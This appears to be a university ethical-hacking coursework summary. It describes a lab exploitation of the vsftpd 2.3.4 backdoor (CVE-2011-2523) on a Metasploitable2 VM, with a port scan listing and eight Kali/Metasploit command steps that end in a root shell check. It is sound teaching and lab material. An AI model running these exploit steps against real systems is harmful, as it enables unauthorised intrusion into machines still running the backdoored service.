
Ethical Hacking Assessment | Practical vulnerability testing of vsftpd 2.3.4 backdoor (CVE-2011-2523) on Metasploitable2 using Kali Linux & Metasploit
Module: - Ethical Hacking University: London Metropolitan University Programme: BSc (Hons) Cyber Security and Forensic Science
All activities were conducted in a controlled, isolated virtual lab for educational purposes only. No real-world systems were targeted. All work complies with the Computer Misuse Act 1990.
Port 21/tcp - vsftpd 2.3.4 (TARGET) Port 22/tcp - OpenSSH 4.7p1 Port 23/tcp - Linux telnetd Port 80/tcp - Apache httpd 2.2.8 Port 139/tcp - Samba smbd 3.X Port 445/tcp - Samba smbd 3.X Port 3306/tcp - MySQL 5.0.51a Port 6667/tcp - UnrealIRCd
Step 1: nmap -sn 192.168.56.0/24 Step 2: nmap -sV 192.168.56.103 Step 3: msfconsole Step 4: use exploit/unix/ftp/vsftpd_234_backdoor Step 5: set RHOSTS 192.168.56.103 Step 6: set LHOST 192.168.56.1 Step 7: run Step 8: id && whoami